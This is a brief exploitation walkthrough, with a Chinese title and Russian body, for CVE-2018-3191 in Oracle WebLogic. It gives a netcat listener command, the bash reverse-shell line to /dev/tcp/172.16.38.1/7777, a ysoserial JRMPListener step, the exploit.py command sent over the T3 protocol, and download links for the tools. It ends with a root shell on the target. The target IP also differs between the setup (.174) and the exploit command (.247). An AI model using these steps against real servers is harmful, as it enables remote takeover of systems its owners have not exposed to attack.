
CVE-2018-3191 反弹shell
CVE-2018-3191 обратная оболочка Локальный IP: 172.16.38.1 Weblogic: 172.16.38.174:7001
Затем выполнить nc -lvv 7777
(1) Команда bash, чтобы избежать экранирования специальных символов при выполнении Runtime.getRuntime().exec(), была закодирована и декодирована в base64. Открытый текст: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Эта операция запускает локальный JRMPListener, который принимает запросы от атакуемого WebLogic и выполняет указанную команду bash для обратного подключения. (3) Nc прослушивает порт 7777 в ожидании обратного подключения bash от хоста WebLogic.
Выполнение: python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, используя уязвимость, заставляет WebLogic обратиться к удаленному RMI-сервису и выполнить команду bash для обратного подключения.
Порт, прослушиваемый nc, получает обратную оболочку bash с правами root.
Необходимые инструменты: ysoserial-master.jar // Инструмент для эксплуатации десериализации https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // Генератор полезной нагрузки CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // Инструмент для отправки по протоколу T3 WebLogic, интегрирующий полезную нагрузку CVE-2018-3191